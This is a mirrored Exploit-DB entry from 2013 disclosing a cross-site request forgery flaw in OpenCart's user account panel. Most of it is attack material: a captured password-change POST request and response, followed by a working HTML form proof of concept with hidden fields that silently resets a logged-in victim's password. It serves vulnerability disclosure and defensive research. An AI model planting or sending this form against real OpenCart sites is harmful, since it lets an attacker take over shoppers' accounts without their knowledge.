bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/24921.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

82 lines
No EOL
2.6 KiB
Text
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title : OpenCart CSRF
# Date : 2013/4/2
# Exploit Author : Saadat Ullah saadi_linux@rocketmail.com
# Software Link : http://www.opencart.com/index.php?route=download/download
: https://github.com/opencart
# Software web : www.opencart.com
# Author HomePage : http://security-geeks.blogspot.com/
# Tested on: Server : Apache/2.2.15 PHP/5.3.3
# Cross-site request forgery
OpenCart is an open source shoping cart system , suffers from Cross-site request forgery through which attacker can manipulate user data via sending him malicious craft url.
OpenCart is not using any security token to prevent it against CSRF.
It is vulnerable to all location inside User panel.
Header
----------------------------------------------------------
http://localhost/index.php?route=account/password
POST /index.php?route=account/password HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=e634322aa558022cdd8664b8d32124b7; language=en; currency=USD
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------2465524120551
Content-Length: 257
-----------------------------2465524120551
Content-Disposition: form-data; name="password"
123456789
-----------------------------2465524120551
Content-Disposition: form-data; name="confirm"
123456789
-----------------------------2465524120551--
Response
HTTP/1.1 302 Found
Date: Tue, 02 Apr 2013 14:49:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 302
Location: http://localhost/index.php?route=account/account
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
----------------------------------------------------------
Simple Poc to change user Password
<form action="http://localhost/index.php?route=account/password" method="post" enctype="multipart/form-data">
<div class="content">
<table class="form">
<tbody><tr>
<td><input name="password" value="987654321" type="hidden">
</td>
</tr>
<tr>
<td><input name="confirm" value="987654321" type="hidden">
</td>
</tr>
</tbody></table>
</div>
<div class="buttons">
<div class="right"><input value="Continue" class="button" type="submit"></div>
</div>
</form>
#Independent Pakistani Security Researcher
Reference in a new issue View git blame Copy permalink